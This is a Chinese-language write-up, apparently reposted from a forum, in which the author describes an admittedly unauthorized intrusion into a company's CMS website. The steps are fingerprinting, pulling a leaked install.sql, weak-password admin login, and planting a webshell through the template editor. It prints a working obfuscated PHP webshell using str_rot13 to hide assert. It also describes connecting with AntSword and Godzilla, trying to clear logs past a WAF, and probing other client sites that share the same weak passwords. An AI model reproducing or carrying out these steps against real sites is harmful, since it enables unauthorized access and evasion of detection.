本稿为“贝米少年”投稿代发

AWVS Appscan Nessus Nmap Goby 先上大型扫描器 没有扫很严重的漏洞

这里就贴几张Tscan的图片把当时用大型扫描器没保存

image-20210427130335968

打开网站一看就是套用的CMS模板 找一下是什么CMS 利用whatweb

image-20210427130942002

image-20210427131334549

看看网站的CSS有没有泄露是什么cms

image-20210427131514034

没找到有用的信息 用dirseach扫一下后台

image-20210427131637398

结果他把cms名字改成他自己公司的名字了 查看CSS发现了真实cms的名字

image-20210427131941993

赶紧gayhub google xxxcms漏洞 发现都是老版本的复现不了 在gayhub下载了一套源码

可惜小菜又不会审计只能找找配置文件有没有漏洞

image-20210427132137488

好眼熟阿 感觉好像是魔改thinkphp5 拿出POC 来验证一下是不存在的

这就不多说了 验证了很长时间rce是没有的

发现DATA下有个install.sql 尝试一下能不能下载

image-20210427132417083

访问目录xx.com/data/install.sql 但是解不开 看一下配置文件

image-20210427132848775

这算0day吗 但是无解

image-20210427132940612

查看后台入口文件

image-20210427134057560

尝试弱口令 过程不讲了 账号密码都是他们公司名字

拿shell的时候钻牛角尖了 进后台就找上传点 以后进后台还是找功能

image-20210427134131684

看到上传设置 但是并不能添加php PHP2 PhP 等 可以添加phtml pht

但是不可以解析 htaccess也利用不了 这里就不多说了

后台看到模板文件编辑 填写<?php phpinfo();?> 查看首页

image-20210427133343877

image-20210427133447206

但是CSS原因看不全 搜索eval 已知 禁用了很多函数

str_rot13函数

<?php

$c=str_rot13('nffreg');

$c($_REQUEST['x']);

?>

str_rot13函数来替代assert。该函数对字符串执行ROT13编码。ROT13编码就是把每个字母在字母表中移动13位。

试了试这个公司给客户做的网站全是这个CMS 而且还都是弱口令。。。。

后台还有XSS漏洞 添加友情连接 任何一处都有 留言处也有

image-20210427140012529

image-20210427135149402

蚁剑连接 xxx.com/index.php 密码x 后台清理日志 被waf拦了

image-20210427170730062

用哥斯拉生成马

image-20210428105438791

连接

image-20210428105648653

需要bypass disable_functions 哥斯拉绕不过去 还得用蚁剑 抓一下包看看 配置代理

image-20210430140411144

先解码看一下

image-20210430140525982

虚拟主机 看一下内核 比较新 问了AG师傅说提不了 我这么菜就更搞不动了

image-20210506115600033

总结:

没啥总结。很简单的一次未授权渗透 。

好好学习,天天向上!

0day : xxx/data/install.sql 数据库泄露

后台入口文件>改了路径也可以通过入口路径跳转

后台模板编辑文件写shell

题外话:遇到一个站后台可能白名单访问 已知白名单的IP 如何突破 http修改突破不了 状态码200 看日志地址是对的 数据包:

image-20210506120323147

想要个账号 希望师傅们给个机会学习

本文迁移自知识星球“火线Zone”

说点什么吧...